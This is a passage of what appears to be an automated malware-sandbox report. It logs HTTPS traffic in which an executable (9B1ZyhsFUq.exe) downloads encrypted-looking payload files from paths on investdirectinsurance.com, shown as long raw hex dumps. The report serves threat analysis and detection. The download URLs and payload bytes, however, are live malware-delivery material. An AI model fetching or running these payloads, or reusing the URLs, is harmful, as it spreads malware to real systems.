2b 37 43 38 38 65 59 7a 32 41 4e 30 4c 6b 63 53 49 64 68 4b 46 33 64 76 33 34 72 4e 63 64 32 66 58 54 75 78 66 58 38 65 37 39 64 46 43 62 35 52 56 4f 68 72 44 6c 51 4a 34 33 49 30 65 74 6b 49 7a 56 63 32 6b 7a 57 2b 6f 30 77 3d 3d Data Ascii: odlXV=NZSPq1aT+BbWIcZjIMZDvoNXMFFUpz/02/FjRh/kbjnNgg6tLkaYU+hutG1eOm1fpxmPhrmhpVH5InYbwRzUsSnvtqPbEAmBFGBDfVXh19BkrtnSf6wPrCykGUoMdFVgCGG7HGy+7C88eYz2AN0LkcSIdhKF3dv34rNcd2fXTuxfX8e79dFCb5RVOhrDlQJ43I0etkIzVc2kzW+o0w==

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49705	172.67.189.102	443	7656	C:\Users\user\Desktop\9B1ZyhsFUq.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 09:39:03 UTC	102	OUT	GET /assuence/litesolidCha/Footer.cli HTTP/1.1 Host: investdirectinsurance.com Connection: close
2024-07-27 09:39:03 UTC	677	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:39:03 GMT Content-Type: application/octet-stream Content-Length: 15872 Connection: close etag: "3e00-66a0246e-21500;;;" last-modified: Tue, 23 Jul 2024 21:45:18 GMT accept-ranges: bytes CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8Jc5na3czZwEoQUnksBcTrgQUiUwcY8nG5yMy5H1KPI6daoPY1Y79ujUwhgA8jFN2UakvnchxTc9gJBuWysv1h2hWD9Hxp6fDFNya%2FZszEamAoiWp8LOCe2MQcoGuMqFrjxq6u64l8pAx%2Bes"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ba8fadea54238-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 09:39:03 UTC	692	IN	Data Raw: ec 6e 34 15 d1 e2 13 6c 87 71 b4 9e 71 fe a4 55 c4 e2 68 2b d0 2a b5 1d db 5f bf 3b 02 f6 10 52 a5 4d e5 ab 40 ce ad f9 4f e9 60 40 bb 2a f2 8e e5 df c3 24 82 a0 e3 02 70 b4 c5 a7 b4 a3 3f be 0c 1b f2 ef 23 64 9e c6 50 4f ad 89 17 3f cc 7f 8f 34 7b bf db 8a 81 cd 94 22 e8 f9 18 92 0e da c0 2d 93 bc b2 59 be 85 a2 8c c5 37 ae 03 11 69 d8 0c d8 e4 53 63 ff e2 16 01 e6 3c 91 f2 4d 68 bd b1 c2 61 df 8a 14 4d a2 1e ba 8d c5 5e a5 d0 6b 7b 07 9e bb 17 c1 6c 0c 15 1a 27 4b fd 04 9c 59 91 a7 ee 39 28 1b 10 a6 9a b3 d3 bc d0 a5 24 82 82 aa 37 fe 99 74 15 4a dc 3e 06 fd 3b 53 88 42 d0 78 1d 27 8d da f0 0d c4 d7 75 8f 24 38 eb d6 3b c9 f2 0b e6 39 fe 31 c5 fb 63 be ca 7e b1 40 ea 4c 82 6a 7d 71 db 4c 6e 21 51 6b a9 df 28 0f e5 46 80 ba d0 6b 0a 92 81 22 9c a8 ef b4 Data Ascii: n4lqqUh+_;RM@O`@$p?#dPO?4{"-Y7iSc<MhaM^k{l'KY9($7tJ>;SBx'u$8;91c~@Lj}qLn!Qk(Fk"
2024-07-27 09:39:03 UTC	1369	IN	Data Raw: 02 e6 60 8a 70 b6 f9 ac 8d 47 f8 36 27 6a 38 ef 76 4c 5b b9 9b 21 db d9 ad 4b 78 c2 4d 8f d9 9b 2a 9f 9e d0 22 41 0e eb bf 42 60 de 80 03 8c c3 59 5b 96 b4 76 da e7 79 83 a9 c6 80 c3 76 ad fe 28 5b cd 06 0c f7 2c 58 3a 0e 47 4e 6f c6 56 bd 30 de 5c 4b 7e 19 42 57 65 6b 4a bd e4 3e bb 90 04 dd 90 21 9a 72 5b 6e e2 4e 0e ee 83 d7 14 36 09 d6 39 9b d0 10 59 7d 05 43 1d 3c 1a 9a 98 07 1c 1d 7e ee 91 6d 9f 30 76 5c 49 78 09 50 b2 14 6e a7 19 5a 07 5f f1 f0 44 c6 d3 d1 1e 83 de 6e bc a5 b5 e5 aa b6 4f 63 1e 07 de 9a f1 ff eb 71 02 2a 7a d0 2a 9a 29 69 17 ad ba 48 42 9b 2b 4f a0 94 ec 99 b8 aa 30 1c b4 15 72 00 cf 16 5e c5 c8 6b a8 30 08 c4 29 d9 49 69 2d ba 95 53 ab a7 7c 59 dd bd fa b2 67 76 30 50 fc aa 91 f9 b0 8a 96 01 91 f6 66 e0 3e 80 64 16 72 0e b5 5f 43 Data Ascii: `pG6'j8vL[!KxM"AB`Y[vyv([,X:GNoV0\K~BWekJ>!r[nN69Y}C<~m0v\IxPnZ_DnOcqz*)iHB+O0r^k0)Ii-S\|Ygv0Pf>dr_C
2024-07-27 09:39:03 UTC	1369	IN	Data Raw: 8b 3f 67 57 9b e3 4a de 15 e2 15 4d 79 91 c8 4c 54 98 dc cb 83 91 e7 e2 a2 46 0e d9 5b 52 45 b8 d8 34 3c 0f 7f ab 03 23 76 9a 42 f6 6d ad b1 15 35 db b4 a3 6d 14 ee c0 20 32 ff 95 b3 0a 5d a7 64 66 2e 1b 51 a7 c5 14 70 98 b7 2e 13 c9 c5 d2 8b 96 5e e7 2b 08 0a f0 a0 75 40 03 7c 2a 85 f6 66 d6 d9 ab 0b 60 8f 1c 0f 54 27 a1 c8 3d 30 56 12 23 0e 4a 62 1d f9 cd 22 45 ad a4 6b dc 3c a0 77 22 56 ae 77 25 a2 32 0e 5e 40 95 57 15 fc a8 28 10 ff b3 66 c9 1e 4a 1e aa f3 51 49 01 14 9d f0 e7 c0 de 7f c7 16 86 f8 b6 cb b2 b2 11 51 fb 68 fc 7e 6c f1 49 92 44 e6 8d db 29 db 2f 40 62 bb ff a5 97 6e c4 5e 98 ee 24 67 61 61 d1 40 1e f5 d8 ff b2 cd f8 ff 12 34 33 76 71 c8 ab 0e 05 a8 4a 31 24 47 4e e9 39 9b be 60 57 32 1d d3 f7 da c1 9c 97 ae 9b f4 eb 06 31 58 4b 54 b6 91 Data Ascii: ?gWJMyLTF[RE4<#vBm5m 2]df.Qp.^+u@\|*f`T'=0V#Jb"Ek<w"Vw%2^@W(fJQIQh~lID)/@bn^$gaa@43vqJ1$GN9`W21XKT
2024-07-27 09:39:03 UTC	1369	IN	Data Raw: 3c 3b 81 0f dd 4b 85 2d 04 96 b2 14 fa e6 7d 76 f9 6c 85 e0 f3 19 0e 24 5b 5b 3e 42 0a 4b df 26 ac 9d c5 cd ca 86 09 c7 db 2f 94 7f 64 62 dc 5d bd 81 cc 05 df 26 6e 2b 4e 9c ac f3 4e 9e f7 a6 75 17 31 cc 4c 1c d9 c1 b8 51 50 67 97 ec 64 23 f6 70 09 97 c8 07 60 e0 d7 78 ba ae f2 44 41 71 f2 f6 74 b8 65 14 a0 3c de cc e1 9f d9 ea 44 31 94 61 0e 6c bb 59 06 d2 04 86 e3 b1 13 74 4f 08 06 21 62 6e b8 7c 59 04 fe 84 7a bd 7e 3d 77 56 04 36 6c 23 b1 ff 67 1d b6 a9 c2 d5 77 1d 02 aa 65 2a e1 e5 65 64 20 f8 17 5f 47 c6 bb 62 ae 99 ba 01 38 a5 bd d1 1c 69 b0 8a 03 64 53 d7 0d a1 51 5e ad 30 73 6f 1f 26 bf 7b ee 05 32 6d e1 e9 f9 25 df e4 f0 b1 f1 ef 62 f7 d5 71 5e 5b 37 b4 bb 58 e5 b1 5b f9 3d bd b4 aa 39 bb 61 23 bd 2d a4 3d bb 0c 1f d3 1d 9d 16 5c 8b 39 53 d8 74 Data Ascii: <;K-}vl$[[>BK&/db]&n+NNu1LQPgd#p`xDAqte<D1alYtO!bn\|Yz~=wV6l#gwe*ed _Gb8idSQ^0so&{2m%bq^[7X[=9a#-=\9St
2024-07-27 09:39:03 UTC	1369	IN	Data Raw: ee d1 e0 6b 26 2d 35 5b 0a be b6 ab 2d 3e 17 1a 71 26 47 9b 5f fb d2 bd 49 a9 86 13 79 1a 01 bf cf 63 bf dc db ae fe 00 26 a6 40 c3 d2 9b f8 56 51 84 1b 3a ac 0c 0b f5 64 5b 7f 2b 20 0b 9a 17 04 36 49 85 e0 d4 22 ad 50 65 4a cd 73 e8 eb ea 24 94 1f 0b 1d 5c e0 ed aa 3d ed 47 46 fd 8e b8 4a 09 4d 98 3f fa 75 77 aa 2f 2a 95 94 53 49 c8 51 5e 07 e2 ad ac 18 7e a8 60 7b db ea 3e 90 7f 6e 07 f1 7f 7e ad 7c 05 a8 56 d8 ab 77 0d a7 7d 89 39 a8 ee 1d af 09 69 84 2b 9e 66 85 18 36 0e 04 6c 59 60 ca ac ac 5c 44 7f dd 8c a3 6a c4 f0 ad a8 53 af 85 bd 17 93 a6 fc 38 43 ba 4d a3 ff b5 7d 4c 31 b6 da 4d 1a 1f 42 5c 7c 9b ef b5 71 5c 09 0a 05 14 a9 0b 72 47 6c 5c 2a 95 e5 ff ed 8d 30 78 a1 5d a9 62 0f ee 21 a2 15 63 d7 75 91 0f 7d 7b ce 23 40 e3 ca fc 53 62 de f8 c9 a3 Data Ascii: k&-5[->q&G_Iyc&@VQ:d[+ 6I"PeJs$\=GFJM?uw/SIQ^~`{>n~\|Vw}9i+f6lY`\DjS8CM}L1MB\\|q\rGl\0x]b!cu}{#@Sb
2024-07-27 09:39:03 UTC	1369	IN	Data Raw: 15 3b 8f 07 28 d4 f7 8e c7 c7 e8 b6 ca 62 53 fd 8a 09 81 49 6f c0 88 82 9f 6f 9f 6a 1b ba 19 b4 32 55 d8 ed 05 54 2c ae dc ae 35 f6 90 28 3f c7 24 9d 57 35 86 71 fc 0e 17 92 85 6d ee f4 13 c4 c3 aa bf 4d f7 1f 29 4e 47 c2 81 ba c8 70 4d 90 b2 d8 27 9e 18 bd 5b 92 df aa 53 6a 14 da e6 cf f9 6b 96 34 f6 db 2e a1 68 f8 f2 a5 91 69 02 d9 7d 89 1b 05 b8 64 68 e8 db a1 09 b3 ef 6f 56 9d d5 4d 19 c2 84 22 1c a0 8d bd cb 2a 66 ef ee 56 86 e2 23 7b 99 63 c8 8a b8 27 43 c1 bb 50 42 b8 dc 51 2d 7d a9 74 00 29 2b a7 63 8c 40 74 01 47 41 c3 2f ce 62 f5 80 8e 83 f2 07 17 c6 b0 ae 69 de 45 0a 5b 3c 21 9b 6d 83 1a bd 83 2c 70 d4 c7 9f 55 29 b5 df 9a cc d2 25 8f 34 39 c2 5f 1a ad f9 72 3e 8a 31 89 ec 65 3e e9 20 32 35 12 c4 09 c4 fa ad 80 78 f8 4f e5 f1 1a e3 4b 56 ae e5 Data Ascii: ;(bSIooj2UT,5(?$W5qmM)NGpM'[Sjk4.hi}dhoVM"*fV#{c'CPBQ-}t)+c@tGA/biE[<!m,pU)%49_r>1e> 25xOKV
2024-07-27 09:39:03 UTC	1369	IN	Data Raw: 80 97 80 84 ef 44 64 94 77 fa 82 5d 54 12 dc 49 9e db 7b 7c da 7c 07 2e f2 71 f8 82 e9 c4 c8 80 5f 7e 1a 1b cb dd a8 73 53 11 f5 fc f1 4b c9 14 92 eb e3 a2 6a d9 44 3f f5 60 a1 47 b1 f9 26 22 25 d9 c0 eb 17 c6 24 47 6a 4d 10 eb 21 f7 da bc e4 30 bc 5c 60 90 5d 89 e7 5d b5 3c ff 05 51 9c 10 d2 0c 23 1c 24 80 a1 a1 3d 44 2a 05 e0 01 2d bd 6f e1 ba 28 c8 65 69 d0 21 b2 86 1f fe 29 e9 59 39 ed 3b 0c 83 70 c3 8b 83 e7 50 ce c7 8b 42 aa a9 f6 40 0a fb 54 c3 e5 f5 b1 58 25 4e 11 f0 df 22 e6 f9 7c a3 12 df 20 82 d4 de b5 ff f2 0e 91 5d bf e6 13 86 14 46 6e 95 cc b8 41 b8 f1 00 07 0e 18 ad 5b 8a 8c 19 24 63 6d b5 9c 6a 6e 55 22 69 b6 ad 50 a2 1a d0 c1 76 49 cb 83 ee 35 fb c7 f0 21 9b 42 49 1c f9 d6 fb 9f 96 53 10 43 32 80 60 77 d9 1e db f2 bf e4 2e 93 5a 6c d2 d9 Data Ascii: Ddw]TI{\|\|.q_~sSKjD?`G&"%$GjM!0\`]]<Q#$=D*-o(ei!)Y9;pPB@TX%N"\| ]FnA[$cmjnU"iPvI5!BISC2`w.Zl
2024-07-27 09:39:03 UTC	1369	IN	Data Raw: 9a 03 44 38 93 47 20 e1 d9 16 ad d6 f4 29 75 1f bb 55 7a a5 9f 0c a7 c3 93 39 96 c4 70 7d 1c 2a c1 f5 07 31 3a 45 a8 d7 76 c1 01 23 dd 0c e9 00 56 08 c2 af 46 aa 24 d0 86 56 b6 f0 30 98 d5 0f 6d c1 9c c6 0e 26 31 e6 23 cd ca b8 fb 78 d6 d0 91 d9 9b 9c d7 dc ac 83 53 cd 26 ea 99 d6 a1 c5 f1 53 01 9e ab 49 ba bb 07 03 16 82 d6 fa d7 ce 7f 6b cc 35 b4 69 ea 6d 71 56 90 4e ad 18 bd 69 53 ee ef ac 82 a1 a8 a3 6c d2 92 98 b9 c5 a1 2e a1 d7 4e b6 27 a2 73 51 34 0b a4 e8 49 ca c4 43 d3 b0 17 3e d2 ad e6 a1 62 14 bd 17 42 b5 53 be 98 b3 7b 52 e0 7f 0f 50 21 5c 6f 82 7b d4 7c 07 0a 6d 1f a2 aa fa 64 a7 ae e4 bf fc dd 09 b9 94 db 6d 5a 89 0b ff fa 0e dd 57 a5 87 91 b8 73 86 15 d6 c8 22 86 fe 57 7b ed bc 40 a7 25 f3 a1 c1 7a 3e 35 58 25 e2 69 16 ff 1a 69 7f 6f f4 a6 Data Ascii: D8G )uUz9p}*1:Ev#VF$V0m&1#xS&SIk5imqVNiSl.N'sQ4IC>bBS{RP!\o{\|mdmZWs"W{@%z>5X%iio
2024-07-27 09:39:03 UTC	1369	IN	Data Raw: d7 4c 0b 72 cc c2 8e 4a b1 e8 a2 92 56 ba fb 71 50 d8 db 7e 26 4a 9e 67 d2 2e 87 93 6a 3c ff f0 8a a0 e4 97 56 cf 65 18 e7 b0 83 c2 98 84 a0 b6 7c dd 8a 49 10 f4 be 52 c0 cc 5a f9 33 c9 4d 34 b9 92 ac a6 f4 7b fc 21 f1 82 a3 36 36 32 81 d4 6d 59 79 8b e4 73 96 da de b4 4e 7e ac 9c 22 5f 14 2a 8a a5 73 ca f6 70 15 67 8c 54 89 c4 d2 99 3a c1 97 63 3f aa c8 12 97 50 51 e9 60 8c 19 d1 52 b3 6a 12 b0 d0 bd 49 e4 64 19 29 91 3f 33 5d f6 66 d7 27 b5 36 80 db cd 39 14 4d 3f 17 2e 6b 1e 31 9d 15 d3 7c 84 ca 2d 9e f6 b9 96 5a 67 6e 77 23 ba 09 45 25 37 73 7e 97 ce 94 ff fc c0 b4 af 53 4b 9a 0c cf a4 4c bb ff 8a 80 ca 09 b8 a9 5c 9e 6b 9c f1 20 ef 7f 74 a9 74 b8 7a cb d8 03 f6 11 b7 6f 12 fc e1 c8 81 66 4e cc 95 f3 7e 8e d3 3b 3e 56 30 e8 1d 1a fe 18 94 67 87 05 af Data Ascii: LrJVqP~&Jg.j<Ve\|IRZ3M4{!662mYysN~"_*spgT:c?PQ`RjId)?3]f'69M?.k1\|-Zgnw#E%7s~SKL\k ttzofN~;>V0g
2024-07-27 09:39:03 UTC	1369	IN	Data Raw: 32 3f 12 9c ce 4c 31 e5 ac 2f b1 f0 71 c6 6f f8 03 a2 6c ed 08 42 25 15 6d 25 5e 2a ed 74 43 86 17 93 7b 93 6f 16 00 95 1d 2d 71 ff 98 a2 a3 b9 3f 64 ee 32 cd db 83 44 51 e4 5d 29 21 58 83 15 4e 4a e2 9a 66 1d 38 c9 e0 f4 60 ec 85 62 14 67 c4 3f 9d 5d f2 36 ba 51 f5 d9 5a 29 ee 36 1e c3 fc 32 60 3b 71 de 9d 9c 17 c2 a5 dc 25 e5 cc a7 97 0c 2e 2d 1d 9e b4 5f 50 07 6f 57 5f f4 f3 8b b5 33 9e 84 05 a4 9d 17 96 7c 62 8f ed 81 9b c7 27 4d 32 d6 12 df 19 63 3b 3e 96 e5 5e b3 68 3c 88 6f 78 0b b8 4f 9a 17 93 34 3c ba 77 39 5d b5 38 ea 0a 41 8b d1 54 cd e6 96 2c c8 c7 e0 34 ae 83 51 b9 5e da 96 69 c8 d4 f3 70 84 c3 64 14 0d c4 29 df c2 59 db 2f a1 fd b0 15 f3 ac d3 f3 d5 08 6e 27 0d b9 e7 d9 18 4f c3 cf 8c 3e 8a f8 ca 46 b9 aa c5 62 33 89 5b 49 65 26 fa 67 92 b0 Data Ascii: 2?L1/qolB%m%^*tC{o-q?d2DQ])!XNJf8`bg?]6QZ)62`;q%.-_PoW_3\|b'M2c;>^h<oxO4<w9]8AT,4Q^ipd)Y/n'O>Fb3[Ie&g

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49706	172.67.189.102	443	7656	C:\Users\user\Desktop\9B1ZyhsFUq.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 09:39:04 UTC	102	OUT	GET /assuence/litesolidCha/Oszina.cli HTTP/1.1 Host: investdirectinsurance.com Connection: close
2024-07-27 09:39:04 UTC	681	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:39:04 GMT Content-Type: application/octet-stream Content-Length: 271872 Connection: close etag: "42600-66a0694e-30cf7;;;" last-modified: Wed, 24 Jul 2024 02:39:10 GMT accept-ranges: bytes CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v9H%2FTxsrsjem3ZvmcR4krewbDb9ZpUMXJ2xebvjztUt1ZzLsH%2B6Ed6toCzK8EN9e93bumAfOUc6jn53KxTIVRsS5hBlgbyVoa%2FxEC0CM9snXMjHRlnaY4e8QKbenwd6gpzrGpsP4WbqhDrmM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ba90198298c89-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 09:39:04 UTC	688	IN	Data Raw: bc 36 32 d2 e0 7f 9e 2f 72 56 e9 37 97 4c 2b dc 59 d1 39 50 7a 89 0d 89 d7 35 50 f1 43 fd d1 76 21 19 5d ab 6b 5a 17 f6 af de 57 5e 51 38 97 21 76 6f 73 07 b4 e1 9a d2 61 2d 43 f3 3f 94 46 42 d0 8f c3 3e 7a 91 6a c1 af 43 dd cb a7 04 7c 17 a4 74 04 e8 f4 26 4a 32 1c c1 a2 17 0d 99 36 0d 1f 84 7f de d9 7e cd 63 0a be cd 70 14 82 f4 a5 af dd d4 38 28 22 4e a2 f6 fb be ed b2 15 d7 d0 3e ee 3a 0e 16 5f 62 ff 22 32 7d af 39 c3 6f a2 84 aa 63 9c 14 58 60 4e 2e c7 b4 9b 4b 5e f7 3a 1a f3 fb 63 87 fc 1d d4 59 78 07 d7 5a d8 44 20 4d d9 3e 74 1b fa 25 8a 10 67 22 c7 04 c5 7d 49 52 8d 35 bd 31 b6 17 74 68 c8 53 69 1b b9 91 d8 e2 8b 2d a2 a5 be 9c 4b b6 8c ee 38 ba da cf 3d eb de 77 18 92 42 fa 45 7e d7 25 2b 19 30 24 7f cf 44 ca 85 2a 32 b2 5b 5b 03 a6 b3 0e 2f 72 Data Ascii: 62/rV7L+Y9Pz5PCv!]kZW^Q8!vosa-C?FB>zjC\|t&J26~cp8("N>:_b"2}9ocX`N.K^:cYxZD M>t%g"}IR51thSi-K8=wBE~%+0$D*2[[/r
2024-07-27 09:39:04 UTC	1369	IN	Data Raw: 50 cf ab 81 6a ff 1a d4 1b 6c 4e 4f 66 a4 4e 41 8e 77 a0 c2 4e 70 53 1b 15 fd b4 d7 63 cf 4a d6 5e 26 79 e9 56 82 17 59 d5 71 fa 89 9a 81 db a6 7d 61 cd 5d b5 1c 4d 8a d9 e9 dd 45 6f 1a 87 c0 37 02 55 17 e4 7e 29 0a f0 56 79 21 b2 6d 82 36 b8 47 d7 ac 8d e2 6d c1 c8 bd d0 03 6e b4 eb e6 a6 3f 56 26 b8 b2 d1 35 ee 32 f4 13 7c b1 22 dd 63 83 7c 9a 11 de bb 2c cc 23 d4 10 0b 9c 42 6b 46 68 db 01 0f 21 f9 77 4f 40 6e 79 08 f1 13 4c 2a 42 05 aa 95 67 5a c0 a7 24 ad cd b1 cc 0c fa 68 c4 be 71 73 c8 4f 46 60 be c0 eb c1 06 13 87 55 c0 c2 45 b3 51 f6 21 d2 34 17 f1 f2 54 b0 7e bc c1 52 2a 11 9d b0 5b fd d9 12 e7 c9 89 5f b4 9f 8c 6a 28 fe 8e 62 61 40 ed d8 bd 43 ec 7f 7d a6 64 e9 cc cf 69 89 9d 4f bb d7 77 54 be 98 4f e0 1c 95 d5 1b 6a 31 14 79 83 5b e4 28 20 40 Data Ascii: PjlNOfNAwNpScJ^&yVYq}a]MEo7U~)Vy!m6Gmn?V&52\|"c\|,#BkFh!wO@nyLBgZ$hqsOF`UEQ!4T~R[_j(ba@C}diOwTOj1y[( @
2024-07-27 09:39:04 UTC	1369	IN	Data Raw: 33 e1 35 60 9f c0 b0 e6 51 56 4d e3 77 52 32 de ab 6e 81 cc 95 38 d2 9d 06 7d be 88 66 ae 43 b4 a5 39 0e f3 7f 05 cc d7 3b ae 20 43 bc e5 94 22 15 df 5d f9 0d 9a f3 29 7a 99 26 a9 06 41 b9 fc 38 6b 62 e5 02 03 75 d3 1b 80 2a 6a 34 b6 ba b3 a2 28 4d a0 28 9b 07 76 bd 29 0d ba 9b 13 6f 11 e3 83 40 63 0b cf 94 e7 0e 2e f4 c6 01 d6 fe e9 19 95 38 ec ba 71 97 c9 56 92 47 d5 00 d8 47 24 d0 d5 5e 41 26 49 65 8d 46 1a 36 58 be 73 3a aa 72 4a 02 fe 2b 80 95 a1 53 b1 e6 63 b5 07 6f 09 d8 92 01 dd fe 92 0e 19 1e a1 f8 5a fc 53 3e a1 d5 ed 63 39 ed 0d 88 ba a9 e3 df 4d bc ba 56 cd 48 01 8d 45 5d 04 ca fc a2 8a bd 28 15 2e c3 c0 05 b9 34 59 1b e9 82 5d 81 97 25 81 85 2f 12 33 bd 44 98 02 ea 24 d9 ee 4e 18 95 1d 7f 9e 90 78 46 52 87 59 18 59 c8 94 60 11 18 3c 4e cd 62 Data Ascii: 35`QVMwR2n8}fC9; C"])z&A8kbu*j4(M(v)o@c.8qVGG$^A&IeF6Xs:rJ+ScoZS>c9MVHE](.4Y]%/3D$NxFRYY`<Nb
2024-07-27 09:39:04 UTC	1369	IN	Data Raw: b6 79 e1 7a d9 92 56 be 84 45 9c 17 0a 04 b0 ec 70 76 ce ae d1 20 30 79 58 82 a0 c1 57 d0 3c 37 52 8a 1e cd c8 98 e5 7f ab 62 6d 4e 5c 52 0e 0f 9f 8e c9 05 af 30 7a 5c b1 69 ed d1 c9 71 f6 8b a3 30 f6 28 d8 b5 34 c4 c9 d0 64 41 d3 49 7a d8 6a 6c ca 8e 79 3a 48 51 10 59 d7 72 d7 fd f0 4c 9d 60 35 30 30 39 a7 07 c0 90 5a a1 6e 17 9b 20 1d 18 6f a2 90 82 7e d6 b1 55 3b fd 1b 49 0f 9c aa 05 78 d3 ab b9 98 06 5b 9d 47 03 5a 47 ca 40 b8 e2 49 3e d3 ab 38 fb bc 32 d7 23 6d 5c 5b 7a 5a f9 ca a4 ef a2 16 31 71 51 76 db b0 ab 44 ba ba b8 d1 2e 6e d6 84 7c fe b2 5b 9a 1e 4f ae 39 d6 8d f6 f4 54 80 31 24 4a 18 f1 7b 3f b2 42 06 c4 9f 6e fd f4 a6 4c 1b e2 28 e4 da ac 75 32 97 76 76 65 ff 8a b1 52 be b2 fe 0e e5 d4 71 98 cc 1b 60 22 9f 92 0d 98 a8 f5 03 39 47 f3 63 15 Data Ascii: yzVEpv 0yXW<7RbmN\R0z\iq0(4dAIzjly:HQYrL`5009Zn o~U;Ix[GZG@I>82#m\[zZ1qQvD.n\|[O9T1$J{?BnL(u2vveRq`"9Gc
2024-07-27 09:39:04 UTC	1369	IN	Data Raw: 5d bf d7 96 60 d2 78 f4 9a f1 e4 ba dc c8 f5 95 2c 7a 39 9c 63 28 ee e9 82 38 ae 62 f5 46 9b 9d 83 4d 8a 5f 12 0a 98 af 40 bd 23 6f 1a 6f af 57 62 38 08 f4 5d 44 3b fb ee 3c 84 64 4b 7a ce f4 66 e5 cd bc 26 5e 26 ca a0 13 6a 60 35 1d d7 5c a6 d3 b2 ff 64 a0 9b fd 2d fb ab eb 8c 16 9f d2 ef fd 04 d3 0c 2d 86 9c 5e 68 e4 ab 60 2f af 94 ce d3 fa 5a da 4c b5 42 04 de 27 b0 42 e0 17 e5 35 4f 92 91 66 fa 6d 2b fd da 42 24 8f 9a ef d8 d7 18 d7 af 7a 58 87 ef 0b 54 fa 92 0a a0 02 f6 5b 4b 98 7d 11 41 f4 7d 04 00 2d 0e 19 de b1 9b 69 18 cd 3a 80 44 11 c4 b5 3c 03 34 59 a5 15 83 b3 b5 0c 14 1b c9 97 52 3a 48 09 3e 88 86 fa 65 43 66 be 4b 65 19 f3 eb 56 c9 38 8f 2c 02 9b 15 3e fd 44 b7 83 93 7d 2e 58 63 68 3f c7 73 c6 48 a9 df ee 9b 05 79 cf 1a 24 0b 51 c0 b0 f1 0e Data Ascii: ]`x,z9c(8bFM_@#ooWb8]D;<dKzf&^&j`5\d--^h`/ZLB'B5Ofm+B$zXT[K}A}-i:D<4YR:H>eCfKeV8,>D}.Xch?sHy$Q
2024-07-27 09:39:04 UTC	1369	IN	Data Raw: 3f d4 b7 78 87 98 70 e0 cb 3b ee e2 c4 ce b1 2e 95 2a 00 8d 3a d7 3e b1 8c d7 b5 a9 98 43 9f 20 e4 09 1c 4f eb ce 7c 52 7e 56 30 a5 93 a8 91 cb 96 27 8f 03 96 c5 ce 40 c2 b1 0b 72 33 b5 03 83 59 38 0f 79 6f 5b 98 12 51 3c eb 9a d3 94 6c ae 2b e8 7f ba d7 0c 20 81 d4 bb fd 03 46 72 72 db 4d 67 52 3f bc ea 49 69 69 cb d7 7e aa f5 07 7b 14 23 e4 e4 01 f1 3a 9c 53 09 1d 4b c7 cf 2e 87 26 fe b2 76 76 f3 fa 20 79 df 4f cb c3 76 8c 72 bd 0d 85 a3 a2 82 93 30 bf 19 32 97 c4 cc 85 fb 8b 75 8b a6 18 41 8b 47 55 92 07 a1 91 3b 82 82 b8 98 cd e2 62 e9 f4 98 0d a1 ce aa e2 6a 59 f9 6e 20 bc f5 33 9c 83 13 19 a5 8f 62 8e de 31 2a 20 f3 69 96 b7 d1 6f b3 10 57 f5 63 0a 7b 69 36 28 3b f8 92 43 d4 02 88 72 c4 c8 ee 12 e4 fe 2f f4 53 56 20 42 e9 a9 7d 23 5d 47 03 a9 92 f5 Data Ascii: ?xp;.:>C O\|R~V0'@r3Y8yo[Q<l+ FrrMgR?Iii~{#:SK.&vv yOvr02uAGU;bjYn 3b1 ioWc{i6(;Cr/SV B}#]G
2024-07-27 09:39:04 UTC	1369	IN	Data Raw: cb d9 34 8f 61 15 41 ed 54 28 53 52 e7 32 de 38 a7 ff f8 a6 50 98 94 66 b2 c2 8e 25 56 40 b1 4c 40 6a 6d 62 8c aa 8a 9c b3 ff c4 79 63 08 60 ec 66 cc 20 9a 64 75 43 9a b8 86 45 eb 65 0f 57 71 b3 85 8c 0a b5 d9 ab 39 48 79 5b 1a 7a e1 c8 3d b9 76 1a 04 e4 0e 33 39 5b ed 88 76 c8 c3 b9 d5 04 06 67 2c f7 4f 1c 87 a1 94 9a 31 0f 82 35 4d f3 d6 17 28 eb 97 31 41 ae 0e e1 dc 1c 57 a4 f1 bd e7 0b dd f7 63 46 b6 6b d0 01 75 ef 52 bc 82 73 a9 00 31 bf 74 13 b9 dc 69 19 63 90 7b 73 ab 74 91 21 24 07 a1 41 33 46 98 d5 63 df c0 ab 04 ed 40 e5 d7 8a db 2a 6c c2 db a9 04 10 e4 0e 99 2c 7a e9 87 a9 05 b7 3a 22 2c e3 fe 62 c4 bf e1 a8 05 d9 33 a2 b7 4a 44 48 41 96 bc af 81 13 78 00 74 1e 19 45 59 3c 06 1b ba ce d0 3b f2 3d 06 f4 a3 76 b9 b3 32 89 ae 25 7f 2d ab c3 40 c7 Data Ascii: 4aAT(SR28Pf%V@L@jmbyc`f duCEeWq9Hy[z=v39[vg,O15M(1AWcFkuRs1tic{st!$A3Fc@*l,z:",b3JDHAxtEY<;=v2%-@
2024-07-27 09:39:04 UTC	1369	IN	Data Raw: 27 dd 27 25 21 22 95 3a 53 03 bf 26 ef dd dc 29 2d f1 d0 0e 60 b8 1a 3c 04 87 07 0c 7c d3 bd 93 6e 0f 85 8f 95 c0 72 d2 ad 6c 09 6d b0 73 f8 85 d4 50 56 2c 15 ac c7 fb e9 13 e5 e9 de ab 89 c0 a5 6b 45 ac 3e ed c2 3d 2c 68 0e 97 04 7a d0 a7 9a 4a 9a 75 db 83 d1 6c 11 73 f2 6b b2 07 37 e9 29 2b f2 74 db 16 e7 df 06 42 83 88 dd 43 9a 3d 4a 0b c3 29 7c a1 df 60 eb cf c4 48 8b 7a 5b 62 23 30 c2 92 b2 3f dc b0 ee 24 65 d5 1f f9 97 71 f3 47 bd 9e 62 41 98 76 b6 28 e2 60 d8 e2 14 7e d0 52 3e 53 76 90 6d e6 2e 12 c5 31 ec 9b 1a a7 13 31 07 d1 57 aa b5 31 8c f2 